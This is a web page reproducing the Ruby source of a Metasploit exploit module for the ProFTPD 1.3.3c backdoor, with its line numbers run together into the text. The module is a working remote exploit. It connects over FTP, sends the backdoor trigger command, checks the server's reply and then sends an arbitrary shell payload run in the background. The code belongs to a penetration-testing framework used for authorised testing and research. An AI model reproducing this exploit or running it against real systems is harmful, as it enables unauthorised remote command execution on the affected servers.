Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(update_info(info,12'Name' => 'ProFTPD-1.3.3c Backdoor Command Execution',13'Description' => %q{14This module exploits a malicious backdoor that was added to the15ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]16archive between November 28th 2010 and 2nd December 2010.17},18'Author' => [ 'MC', 'darkharper2' ],19'License' => MSF_LICENSE,20'References' =>21[22[ 'OSVDB', '69562'],23[ 'BID', '45150' ]24],25'Privileged' => true,26'Platform' => [ 'unix' ],27'Arch' => ARCH_CMD,28'Payload' =>29{30'Space' => 2000,31'BadChars' => '',32'DisableNops' => true,33'Compat' =>34{35'PayloadType' => 'cmd',36'RequiredCmd' => 'generic perl telnet',37}38},39'Targets' =>40[41[ 'Automatic', { } ],42],43'DisclosureDate' => '2010-12-02',44'DefaultTarget' => 0))4546deregister_options('FTPUSER', 'FTPPASS')47end4849def exploit5051connect5253print_status("Sending Backdoor Command")54sock.put("HELP ACIDBITCHEZ\r\n")5556res = sock.get_once(-1,10)5758if ( res and res =~ /502/ )59print_error("Not backdoored")60else61sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")62handler63end6465disconnect6667end68end697071